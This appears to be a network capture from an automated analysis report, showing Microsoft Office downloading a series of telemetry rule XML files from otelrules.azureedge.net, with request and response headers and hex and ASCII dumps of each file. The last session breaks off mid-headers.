                                                                                                                                                                      2024-11-21 05:23:37 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      48192.168.2.64976013.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:37 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:37 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 404
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                      ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                      x-ms-request-id: ae8c6dce-101e-008d-4280-3b92e5000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052337Z-1777c6cb754dqf99hC1TEB5nps0000000akg000000002pet
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:37 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      49192.168.2.64976113.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:37 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:37 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                      ETag: "0x8DC582BB046B576"
                                                                                                                                                                      x-ms-request-id: e83eb970-001e-0046-777e-3ada4b000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052337Z-1777c6cb754gvvgfhC1TEBz4rg0000000ang00000000huyk
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:37 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      50192.168.2.64976313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:37 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:37 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 400
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                      ETag: "0x8DC582BB2D62837"
                                                                                                                                                                      x-ms-request-id: 792329fd-401e-0035-1f6c-3b82d8000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052337Z-178bfbc474bv7whqhC1NYC1fg4000000013g000000002s0d
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:37 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      51192.168.2.64976413.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:37 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:38 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:38 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 479
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                      ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                      x-ms-request-id: b033e842-001e-0049-17d5-3b5bd5000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052338Z-r1d97b995777mdbwhC1TEBezag00000009z00000000037tv
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:38 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      52192.168.2.64976513.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:39 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:39 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:39 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 425
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                      ETag: "0x8DC582BBA25094F"
                                                                                                                                                                      x-ms-request-id: 62f36519-501e-0016-468c-3a181b000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052339Z-1777c6cb754xjpthhC1TEBexs80000000ah00000000062md
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:39 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      53192.168.2.64976613.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:39 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:39 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 475
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                      ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                      x-ms-request-id: 76e95f1f-101e-0034-7059-3b96ff000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052339Z-178bfbc474brk967hC1NYCfu6000000000wg000000003kdt
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:39 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      54192.168.2.64976713.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:39 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:39 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:39 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 448
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                      ETag: "0x8DC582BB389F49B"
                                                                                                                                                                      x-ms-request-id: 71c2edc3-001e-0082-0fa6-3b5880000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052339Z-r1d97b995778dpcthC1TEB4b5400000009tg000000009sgm
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:39 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      55192.168.2.64976813.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:39 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:39 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 491
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                      ETag: "0x8DC582B98B88612"
                                                                                                                                                                      x-ms-request-id: 5b8d3f05-a01e-006f-2465-3b13cd000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052339Z-178bfbc474bw8bwphC1NYC38b400000000t000000000prbv
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:40 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      56192.168.2.64976913.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:40 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:40 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:40 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 416
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                      ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                      x-ms-request-id: c4abe473-d01e-008e-4d67-3b387a000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052340Z-178bfbc474bh5zbqhC1NYCkdug00000000xg00000000exr8
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:40 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      57192.168.2.64977013.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:41 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:41 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:41 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 479
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                      ETag: "0x8DC582B989EE75B"
                                                                                                                                                                      x-ms-request-id: fcdc764c-f01e-0052-4963-3b9224000000
                                                                                                                                                                      x-ms-version: 2018-03-28
